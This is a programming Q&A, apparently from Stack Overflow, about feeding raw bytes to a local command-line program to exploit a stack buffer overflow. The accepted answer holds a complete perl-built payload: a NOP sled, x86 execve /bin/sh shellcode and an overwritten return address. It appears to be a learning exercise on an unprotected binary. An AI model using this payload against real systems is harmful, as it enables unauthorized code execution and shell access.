# Argument input for a bufferoverflow

Tags: c, input, buffer, command-line-arguments, buffer-overflow

I am trying to spawn a shell on a commandline program without stack protection, this program takes in two inputs a number and a date.

```
./convert <number> <date>
```

and I want to *overflow* the buffer, now I am trying to do

```
[nop sled] ..... [shell code] ..... [return address]
```

my problem lies in the fact when I pass the nops through the command line (or more precisely in GDB). In GDB when I do a run with the arguments: `1 \x90\x90\x90\x90.... 700` bytes worth, what it takes in as input is the actual characters `'\' 'x' '9' '0'` as oppose to the hex value for `nop`. How can I enter this in properly? (I know this because the EIP gives me `39785c30` which translates into `9x\0`). What can I do about this?

Comment: The answer depends on your character encoding, but if you use 8-bit ascii then É seems to have ascii code 0x90. (E with accute accent)

Comment: @KlasLindbäck Lets say I am simply entering in the command via CLI, this string with the nop sled shell code and return address is in it. I am using bash. I do not know why it will not input the hex as oppose to the characters

Comment: @Kevin The translation of `\x90` to the single byte value 144 in strings in C code is done by the compiler. Unless the documentation specifically mentions that the CLI of gdb does a conversion there is no reason to expect one.

Answer (score 0, accepted):

Okay, Got it! one can use the perl print function and use the escapes to have it print the nops (and other characters that you cant print with a keyboard). for example `perl -e 'print "\x90"'` and it will send 0x90 to memory (or whatever you need).

I did something like this:

```
egg=$(perl -e 'print "\x90"x719, "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "\x90\xf6\xff\xbf"x5')
```

Thanks all for the help!